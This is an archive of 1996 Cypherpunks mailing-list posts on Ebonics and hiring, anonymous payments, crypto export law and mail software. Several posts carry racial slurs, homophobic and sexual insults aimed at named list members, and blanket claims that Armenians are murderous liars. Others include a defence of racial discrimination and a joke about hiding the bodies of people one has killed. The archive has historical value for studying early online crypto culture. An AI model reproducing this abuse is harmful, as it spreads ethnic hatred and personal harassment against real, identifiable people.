From: Dale Thorn <dthorn@gte.net>
Date: Mon, 23 Dec 1996 09:27:33 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Ebonics
In-Reply-To: <8wFDZD22w165w@bwalk.dm.com>
Message-ID: <32BEB23B.20B8@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> jim bell <jimbell@pacifier.com> writes:
> > At 01:30 PM 12/22/96 -0500, Mark Rosen wrote:
> > >Hehe. What I mean to say is that since both Ebonics and a Southern accent
> > >are learned during early childhood, you have no control over how you talk.

> > This is not true.  The recent commentary and interviews I've seen on this
> > subject make it clear that the people speaking "Ebonics" are quite capable
> > of speaking in standard English, and do so when they find it, er, convenient.

> How does this tie into assassination politics?

Some of the postings here about people making a non-hire list because
of their speech "accent" is reminiscent of other forms of targeting.
I thought AP was more oriented toward selection based on behavior,
although in some people's poisoned minds, another person's speech
patterns/accents could be interpreted as behavior.

Don't you suppose that when some of the party-line-liberal (brainwashed)
persons (esp. from the Northeast or the Bay Area) hear a person speaking
in an authentic Southern "accent", that they often feel a twinge of fear,
as though someone from the KKK or whatever has just entered their immediate
surroundings?  I know that sounds kind of silly, but people do have those
knee-jerk reactions to certain visual and auditory clues, particularly
when they've been bombarded by big media with all those stereotypical
images over the years.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 23 Dec 1996 05:41:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: HIH_and
Message-ID: <1.5.4.32.19961223133712.0068f4c0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


12-21-96:

"In Encryption Politics, Some Good News for Bankers"

  "Everyone knows that DES is not enough," said Perry Metzger. 
  This dispute places the banking and financial services community 
  squarely in opposition to government intelligence agencies with 
  which it has historically worked hand in hand on security matters.
  "The Feds won't realize export controls don't work even after the
  dried, strangled corpse of the U.S. security software industry is
  laid before the Congress," Mr. Metzger said. "They will leave the
  manacles on the corpse long after it is obvious that the body isn't
  going anywhere."

"Central Banks' Task Force Sees No Need for Alarm"

  While the security architectures of most electronic money
  systems share many design features, a wide range of options is
  available to product developers in terms of specific chip-card
  security measures, cryptographic algorithms, key lengths, and
  transaction monitoring.

"SPA Voices Concerns Over Clinton Encryption Policy"

  In a letter last week to Vice President Al Gore, SPA raised
  several concerns that the software industry has with the
  administration's interim rules on encryption policy.

"NSA/ On The Costs of Anonymity"

  "How to Make a Mint: The Cryptography of  Anonymous Electronic 
  Cash" has been making the rounds of the electronic money community. 
  It raises security and law enforcement concerns about anonymous 
  systems designed like Digicash Inc.'s Ecash.

-----

HIH_and  (25 kb)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@issl.atl.hp.com>
Date: Mon, 23 Dec 1996 05:44:37 -0800 (PST)
To: mjmiski@execpc.com (Matthew J. Miszewski)
Subject: Re: Ebonics
In-Reply-To: <3.0.32.19961222164822.006c01fc@mail.execpc.com>
Message-ID: <199612231355.IAA15284@jafar.issl.atl.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


Matthew J. Miszewski writes (directed to Tim May):
> You do advocate the unemployment of people who do utilize such a
> dialect/language.

I've never seen Tim "advocate the unemployment" of anyone or any group.
He has merely argued that an employer should be free *not* to hire an
individual for any reason whatsoever.  Such a reason might include his/her
language/dialect, appearance, race, gender, religion or any other
(arbitrary-to-an-outsider) criterion.  This is a standard libertarian
position and shouldn't be too difficult to grasp.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BJORN2LUZE@prodigy.com (NATHAN MALLAMACE)
Date: Mon, 23 Dec 1996 06:21:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: MERRY CHRISTMAS
Message-ID: <199612231403.JAA03570@mime4.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


cypherpunks@toad.com

I am getting into the HOLIDAY SPIRIT with MY WEB PAGE: http://pages.
prodigy.com/VT/hackersguide
Enjoy!

Fifthnail




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Mon, 23 Dec 1996 07:32:19 -0800 (PST)
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Ebonics
In-Reply-To: <199612222158.QAA10211@mercury.peganet.com>
Message-ID: <199612231530.JAA04232@bigeasy.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


> > from grammatically incorrect speech.  I can speak with grammatic
> > perfection and a
> > drawl so heavy it'll make your eyeballs hurt. 
>  Yeah. I thought the issue was understanding in the workplace; no
>  matter
> how gramatically correct your are, I can't understand you and so I
> won't hire you.


Re-read what I said carefully.  I "*can* speak"... I can also speak 
more clearly.  The same holds true, for speakers of "ebonics." 
and it is an insult to their intelligence to imply that they cannot 
or cannot easily learn to.  

yeehaw.

me 
--------------------------------------------------------------
 Omegaman <mailto:omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
Send a message with the text "get key" in the 
"Subject:" field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Mon, 23 Dec 1996 07:30:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <v03007801aee25b84a198@[207.167.93.63]>
Message-ID: <199612231530.JAA04229@bigeasy.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


 > imho, it's a very warped kind of mind that insinuates some evil is
> no big deal because greater evils exist in the world. 

It's a matter of perspective and a weighing of consequences.  Are you 
trying to so that all evils are inherently equal?
 
> it's an argument I see often among the libertarians 
> around here. "what's the big deal
> about murder? govt's do it all the time. everyone should be able to
> murder anyone if govt's do it. why, the right to murder people is an
> inalienable right!!". of course the arguments are never made in this
> language-- the fun is spotting it in the rhetoric.

I often see arguments on this list where people happily build 
irrelevant straw men and pound them into a pulp.  What's more amazing 
is that they're not doing it deliberately; they simply miss the 
point.

You see whatever you expect to see.
 
> >This is why I look forward to this Brave New World of fully
> >untraceable communications and fully untraceable economic
> >transactions.
> 
> ah, an even more warped mind that not merely condones it but
> "looks forward to it"
> 
> careful, timmy, your slime is showing!!

Careful vladdy, your detweiler is showing.

I thought the message was a pretty clear statement of opinion.  ie. 
the deconstruction of democracy is a good thing and cryptoanarchy 
will a enable a more just society.  (Some would argue more brutal as 
well, but I think that the level of brutatlity in society would 
change little from it's current levels.)

So cut the crap and go ahead and argue for or against that thesis.

(by the way.  Conveniently enough Tim May has put his ideas on the 
web in quite a bit of detail.  Just put "cyphernomicon" in your 
favorite web search engine)
--------------------------------------------------------------
 Omegaman <mailto:omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
Send a message with the text "get key" in the 
"Subject:" field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 23 Dec 1996 06:52:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Mr. May's Posts.  Other Things.
In-Reply-To: <199612230801.AAA24862@adnetsol.adnetsol.com>
Message-ID: <Z19DZD29w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


> On or About 21 Dec 96 at 10:36, Dr.Dimitri Vulis KOTM wrote:
>
> > Interesting. Paul Bradley does not consider Timmy May's (fart)
> > latest rants on "ebonics" and "colored race" to be racist? I think
> > Timmy May hates blacks even more than he hates Jews. Let's quote
> > Timmy's sick garbage on soc.culture.african.american and ask if they
> > find it offensive and racist.
>
> Yes, Dr., this latest tripe that has spewed forth from Tim's keyboard
> reeks of bigotry.  And all this time I felt you may have been too
> hard on him.  This latest rant of his has made me reconsider your

I do *not* have a hard-on for Mr. May.  Perhaps Mr. Gilmore does.

> rough treatment of Mr. May.  I kinda think he deserves a slapping
> right now.

Timmy deserves a spanking, but he'd probably enjoy it.

> I find Mr. Mays comments quite racist and are quite off topic for
> this list.

Cryptography is off-topic for this list. Anything else is on-topic. :-)

Thank you for your comments,

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Mon, 23 Dec 1996 09:35:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: the word is "NIGGAZ"
Message-ID: <199612231735.JAA11308@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


From: jlucas4@capital.edu (Jesse Lucas)

>Actually the word is "niggus."
>"Niggas" would be referring to other black fellows in a friendly way. 
>
>More or less.  
>
>Gangsta J

Where does "coons" fit into this oh so intellectual discussion?

Is this one of Dale's?

Down Home




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 23 Dec 1996 07:01:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <199612230617.WAA04103@netcom6.netcom.com>
Message-ID: <s09DZD30w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Vladimir Z. Nuri" <vznuri@netcom.com> writes:

> poor timmy laments that no one responded to his latest
> gedanken masterpiece. I am very pleased to be the one to
> relieve him of his loneliness.

I think Timmy mentioned something about a tryst with Gilmore (spit).
Is that why the coward has quiesced posting his tripe to this list?
Would it be more appropriate to put (swallow) rather than (spit)
after Gilmore's name?
How much proeteins, fats, carbohydrates, and vitamines are contained
in an average human ejaculation?
What about farm animals'?
Timmy (fart) and John (swallow) can tell us a lot about this subject.

> Timmy writes:
> >Fortunately for the bulk of us, the likely number of deaths and economic
> >losses from such crimes of kidnapping, extortion, and even murder for hire,
> >is still likely to be vastly lower than the number of deaths caused by
> >powerful central governments enriching themselves and their cronies with
> >foreign wars. Not to mention the deaths in the Drug War, the lives wasted
> >in other interferences in private behavior, etc.
>
> imho, it's a very warped kind of mind that insinuates some evil is no
> big deal because greater evils exist in the world.

Yes, Timmy May is one sick motherfucker.

> it's an argument I see often among the libertarians
> around here. "what's the big deal
> about murder? govt's do it all the time. everyone should be able to
> murder anyone if govt's do it. why, the right to
> murder people is an inalienable right!!". of course the arguments
> are never made in this language-- the fun is spotting it in the
> rhetoric.

Of course Timmy May is a coward. Despite his boasting about his
assault weapons collection, he probably doesn't have the balls
to ice a mouse caught in a mousetrap. Timmy is probably so femme,
he wails like a banshee and asks whoever he sleeps with that day
to take the mouse out.

> >This is why I look forward to this Brave New World of fully untraceable
> >communications and fully untraceable economic transactions.
>
> ah, an even more warped mind that not merely condones it but
> "looks forward to it"
>
> careful, timmy, your slime is showing!!

It's been showing for a while. Timmy May has been exposed on this list
as a coward, a liar, a racist, and an all-around scumbag.

> (it would be fun to debate you publicly some day on your true beliefs, but
> alas, you never bite. oh well, I stay amused well enough..)

Like I said, Timmy May is a coward.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@USIT.NET>
Date: Mon, 23 Dec 1996 07:39:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: ~digicash at Shell
Message-ID: <Pine.GSO.3.95.961223103208.9873C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Shell is now marketing a stored-value card in $25, $50, and $100 face
denominations.  The $100 card retails for $94 right now.  I'm not sure if
that discount will be a long-term thing or if it's just to get people
hooked.  Anyway, the card can be purchased anonymously for cash and can be
used to buy anything at Shell.  I like to use the automated
pay-at-the-pump gizmos to save time but I don't like to leave a digital
footprint behind on my credit card statement for Louis' Legions to peruse,
so I think the stored-value card is a step forward for privacy.

Anybody know if these cards are useable overseas?

bd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Mon, 23 Dec 1996 10:41:30 -0800 (PST)
To: omega@bigeasy.com
Subject: Re: Ebonics
Message-ID: <3.0.1.32.19961223104039.012b6340@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:32 AM 12/23/96 +0000, Omegaman wrote:
>> > from grammatically incorrect speech.  I can speak with grammatic
>> > perfection and a
>> > drawl so heavy it'll make your eyeballs hurt. 
>>  Yeah. I thought the issue was understanding in the workplace; no
>>  matter
>> how gramatically correct your are, I can't understand you and so I
>> won't hire you.
>
>
>Re-read what I said carefully.  I "*can* speak"... I can also speak 
>more clearly.  The same holds true, for speakers of "ebonics." 
>and it is an insult to their intelligence to imply that they cannot 
>or cannot easily learn to.  

I am waiting for the "language police" to get ahold of Ebonics.  I can just
see inner city kids being told that they are not slurring their vowels
properly or any other of a thousand obscure rules of language.

Maybe the best way to kill a subculture's language is to codify it,
regiment it, and then force it to be taught in the schools.

What the hell this has to do with crypto, I have no idea...


---
|        "Spam is the Devil's toothpaste!" - stuart@teleport.com         |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kwit@iap.net.au
Date: Sun, 22 Dec 1996 18:53:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: unsuscribe   kwit@iap.net.au
Message-ID: <32BDF37F.D63@iap.net.au>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe  
        kwit@iap.net.au




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@primenet.com>
Date: Mon, 23 Dec 1996 03:04:42 -0800 (PST)
To: Lucky Green <cypherpunks@toad.com
Subject: Re: Slaughter
In-Reply-To: <3.0.32.19961222165943.006b21a8@netcom13.netcom.com>
Message-ID: <199612231107.EAA01210@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 I just summarize grace and serenity to:

    Lord grant me the serenity to accept the things I cannot change.
      The courage to change the things I can.
        And the wisdom to hide the bodies of the people 
          I had to kill because they pissed me off.
              --attila

    Intimidation is just another form of communication.

        ======  previous post ======
        
::>The standard version:

::>God grant me the serenity to accept the things I cannot change; 
::>The courage to change the things I can;
::>And the wisdom to know the difference.  (quote not necessarily exact). >
::>My version:

::>God grant me the wisdom to know the difference between right and wrong; 
::>The courage to support those who I feel are doing the right things, 
::>and to oppose those who are doing the wrong things;
::>And the serenity to do so as peacefully as possible.

::Another, increasingly popular, variety of the AA "prayer" is:

::God grant me the serenity to accept the things I cannot change;
::The courage to change the things I can;
::And the firepower that makes the difference.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMr5m/b04kQrCC2kFAQGszwP/ZzRVYeaHdwkIlK7u9x/YwI0UXVvRvfn3
MABhE2eFjnRtOwL3mzG7E7xefcFa5w4S+hSjme+BKFvrIZ3D8mbmDHbLmUkbt/n6
qkY4Gf1w05jR/SAOcE3dNoGMOZWCPGfnBVnYJ0A3M46PDGG84XYywzGxibQAy123
obidctR+3XY=
=jrJy
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 23 Dec 1996 08:31:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Privtool 0.87
In-Reply-To: <Pine.3.89.9612221336.A789-0100000@marui>
Message-ID: <uHDeZD32w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark Grant <mark@unicorn.com> writes:

>
> I've finally released a new version of Privtool -- my PGP-aware X-windows
> mailreader for Linux, SunOS, FreeBSD and Solaris. Version 0.86 is
> available on utopia.hacktic.nl in the incoming directory (and possibly
> elsewhere) and I'll be uploading 0.87 shortly. For more details and
> screenshots see http://www.c2.org/~mark/privtool/privtool.html.

"Cypher punks" don't write code. Hence Mark is not a "cypher punk".

That's the kind of software we need. How about a PGP aware client for
Windows 95 and NT that would talk to POP3 and SMTP servers? Sort of
like a drop-in replacement for the mail programs that come with Netscape
and MS IE. By the way, the mailtool that comes with SunOS is really
lame. Take a look at Z-mail (if it's still around - I understand the
company that used to market it got bought by some homos who totally
screwed it up).

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Gurski <mgursk1@umbc.edu>
Date: Mon, 23 Dec 1996 08:14:10 -0800 (PST)
To: cypherpunks list <cypherpunks@toad.com>
Subject: Re: Legality of requiring credit cards? (fwd)
In-Reply-To: <m0vc2qk-0002wCC@mirage.skypoint.com>
Message-ID: <Pine.SGI.3.95.961223111126.17296A-100000@umbc10.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Dec 1996, Charles Gimon wrote:

> Equifax does business by tracking reputations, as do all credit
> reporting companies. That's how a free market handles bad checks.

Yes, and if I'd *ever* written a bad check, it would be a different
story.  The weasel there basically said that because I'd made
purchases there in the past few days, they tried to contact my bank on
a Sunday afternoon....  (No, I don't get it either)

But that still doesn't answer whether or not a credit card can be
requested when paying by check.


--
|\/|ike Gurski  mgursk1@umbc.edu  http://www.gl.umbc.edu/~mgursk1/
finger/mail subject "send pgpkey"|"send index"  Hail Eris! -><-  O- |Member,
1024/39B5BADD PGP Keyprint=3493 A994 B159 48B7 1757 1E4E 6256 4570  |   Team
My opinions are mine alone, even if you should be sharing them.     |   OS/2
	    Senate Finance Committee Chair, SGA 1996-1997





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Mon, 23 Dec 1996 11:21:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: One-time pads
Message-ID: <199612231921.LAA31197@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy C. Mayo studied yoga back-streching 
exercises for five years so he could blow 
himself (nobody else will).

   /o)\ Timmy C. Mayo
   \(o/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 23 Dec 1996 09:07:42 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Ebonics
In-Reply-To: <ywaDZD18w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961223120816.15518A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> "Matthew J. Miszewski" <mjmiski@execpc.com> writes:
> > just trying to counter some of the statements made here.  Sometimes people
> > view cpunks as some sort of borg-like mind with no dissidents.
> 
> "Cypher punks" is a private mailing list owned by the asshole censor John
> Gilmore who unsubscribes whoever dares post something John doesn't like.

QED, he must REALLY like you since you're obviously still here; either 
that, or you're full of shit as usual.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Mon, 23 Dec 1996 12:18:48 -0800 (PST)
To: "'Michael Gurski'" <mgursk1@umbc.edu>
Subject: RE: Legality of requiring credit cards? (fwd)
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961223201606Z-4891@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mike Gurski asks:
> But that still doesn't answer whether or not a credit card can be
> requested when paying by check.

I believe it can be.  Until a few years ago, it was common to request
a credit card AND TO RECORD THE NUMBER ON THE CHECK.  Legislation was
enacted (this might have been just in California, I'm not sure) to
prevent them from recording the number, but I believe it specifically
allowed them to continue to ask to see that you have a card (they
shouldn't need to see the number, so I believe you are within your
rights to, say, obscure it with your thumb).

Of course, they are (and should not be) under any obligation to accept
your check in the first place, so I would think the ID they request
would be up to them.

Tunny
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================

-----BEGIN PGP SIGNATURE-----
Version: 4.0 Business Edition
Comment: which I won in the PGP raffle at Cypherpunks 12/96...

iQEVAgUBMr7n+/AmQsmyRPddAQFFGAf9EHlEKf4k3wuGfIQKV7ZKxHtgMwZi3MWf
yzADHsHlLDo7c3fN4qPoMMsXh0odO5JDGjXKg+zJ+LhcuKaPjfe4mzHwYOxDD8fJ
JxG6Gex1l9iNSOfqDIgrk+29DR5noMnpdBUwTkznBlm35y32ucxC1Spc/G8zqwdJ
cyl/6oCuGAY+xvgHi30dnNHX1b+KcqihESm6huSQJkDMVb1ctp84aEzP894iHrnl
aq4Kt8H174lj4ke0fwEaPT2SmGpnXLn+I9xw4sYlhCzMfMz3VEMIZCfmVDWI5OgM
R1ktJJs9KM5jXSBA/fSZoRdD9FogwNSiaMEkQ1IRYA4EAQqJd8hOpw==
=9xWW
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 24 Dec 1996 07:49:41 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Armenians  (was Securing ActiveX)
Message-ID: <851441030.96376.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> "Generalisation"? It's a historical fact that Armenians have murdered
> 2,500,000 Turks, Kurds, and Sephardic Jews in this century alone.

Yes it was, you stated that "Armenians are murderous cowards", 
whether that is true in the majority of cases I am not well qualified 
to comment but to make a statement to the effect that an entire class 
of people are genocidal because a number (even a majority) of them 
are seems to me a sweeping generalisation.

> Interesting. Paul Bradley does not consider Timmy May's (fart) latest rants
> on "ebonics" and "colored race" to be racist? I think Timmy May hates
> blacks even more than he hates Jews. Let's quote Timmy's sick garbage on
> soc.culture.african.american and ask if they find it offensive and racist.

My point was not that you had no right to be racist, you have every 
right to discriminate against someone on the basis of their colour, 
religion etc... my point was you are standing on very thin ice when 
you flame someone for being racist then post racist comments 
yourself. 


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 23 Dec 1996 10:26:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <32BEB23B.20B8@gte.net>
Message-ID: <k9HeZD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
> Don't you suppose that when some of the party-line-liberal (brainwashed)
> persons (esp. from the Northeast or the Bay Area) hear a person speaking
> in an authentic Southern "accent", that they often feel a twinge of fear,
> as though someone from the KKK or whatever has just entered their immediate
> surroundings?  I know that sounds kind of silly, but people do have those
> knee-jerk reactions to certain visual and auditory clues, particularly
> when they've been bombarded by big media with all those stereotypical
> images over the years.

Americans in general are extremely xenophobic and react very negatively
to anyone with a "foreign" accent. A few weeks ago I visited rural
Massachussetts. The people there are extremely hostile even to Americans
who don't speak with their particular regional accent.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 23 Dec 1996 10:29:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <Pine.SUN.3.91.961223120816.15518A-100000@beast.brainlink.com>
Message-ID: <JBieZD34w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:

> On Sun, 22 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
>
> > "Matthew J. Miszewski" <mjmiski@execpc.com> writes:
> > > just trying to counter some of the statements made here.  Sometimes peopl
> > > view cpunks as some sort of borg-like mind with no dissidents.
> >
> > "Cypher punks" is a private mailing list owned by the asshole censor John
> > Gilmore who unsubscribes whoever dares post something John doesn't like.
>
> QED, he must REALLY like you since you're obviously still here; either
> that, or you're full of shit as usual.

I'm sure Earthnet must be *very* embarrassed about having hired such a lying
twit for ssociate network manager. For those who haven't gotten the story
straight, or are confused by the lies being spread by the various genocidal
Armenian maniacs (like Dale seemed to be at one point), I'll reiterate:

John Gilmore unsubscribed me from this mailing list (in a very rude manner)
and I am not allowed to resubscribe. I am not subscribed to this mailing list.

John Gilmore announced on this mailing list that he did it because he didn't
like the content of my submissions. He repeated this to Declan McCullough.

Later, when he realized how badly his censorship reflected on him and his EFF,
he had Timmy May post another lie, claiming that I was kicked off this list
for posting too much, and defending Gilmore's content-based censorship.

Ray Arachelian obviously lies again when he claims that I'm "obviously
still here". But what else could be expected from an Armenian.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer@dhp.com (Anonymous)
Date: Mon, 23 Dec 1996 10:00:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Certified primes
Message-ID: <199612231800.NAA23124@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


From: lucifer@dhp.com (Anonymous)

>Timmy `C' May is a certified sexual pervert who wears women's >underwear.

Pardon, what does one have to do with the other?

And who really gives a rat's ass anyway?

Where is Logos now that we need him?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 23 Dec 1996 10:26:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <199612231355.IAA15284@jafar.issl.atl.hp.com>
Message-ID: <mkieZD35w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Barber <jeffb@issl.atl.hp.com> writes:
> Matthew J. Miszewski writes (directed to Tim May):
> > You do advocate the unemployment of people who do utilize such a
> > dialect/language.
>
> I've never seen Tim "advocate the unemployment" of anyone or any group.
> He has merely argued that an employer should be free *not* to hire an
> individual for any reason whatsoever.  Such a reason might include his/her
> language/dialect, appearance, race, gender, religion or any other
> (arbitrary-to-an-outsider) criterion.

No, that's what I said. Get your attributions straight.

>                                        This is a standard libertarian
> position and shouldn't be too difficult to grasp.

Bullshit. "Libertarians" are fucking statists who whine on this list
about "illegal discrimination" and the need for the gubmint to enforce
the "right to work".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cygnus.com>
Date: Mon, 23 Dec 1996 10:03:12 -0800 (PST)
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: Reflections on the Bernstein ruling
In-Reply-To: <3.0.32.19961220234518.006a1ef4@law.uoregon.edu>
Message-ID: <t53n2v5gmxe.fsf@rover.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles <gbroiles@netbox.com> writes:

>> (Please keep in mind that I'm not a lawyer yet, and that my comments are
>> intended only as the reflections of an amateur and are intended as
>> discussion fodder, not legal advice.)

I'm not one either.

>> It's also unclear that Judge Patel's ruling is enough to make export of
>> crypto source legal by people/organizations located even in the Northern
>> District of CA. Venue is proper, in an ITAR case, in any jurisdiction which
>> the defense articles have moved through. (18 USC 3237(a); _US v. Durrani_
>> 659 F.Supp 1177, 1182 (D. Conn, 1987); an easy analogy is to the _US v.
>> Thomas_ "Amateur Action" case, where Tennessee venue was proper for
>> prosecution of California defendants who sent porn into Tennessee.) So it's
>> at least arguable that the feds could simply bring an ITAR prosecution in
>> another district, if exported crypto flowed through that district. (But I
>> don't think they can do so against Dan Bernstein because of "res judicata",
>> a doctrine which says that once two parties have fully litigated an issue,
>> they cannot come back to the same court - or a different one - and ask to
>> relitigate the same issue.) 

It happens to be the case that the Northern District of California
borders on the Pacific Ocean, and includes (at least) two airports
with direct flights to more crypto-friendly jurisdictions to the west.
I do not know if there are any satellite or oceanic cables similarly
situated, but I wouldn't be surprised.

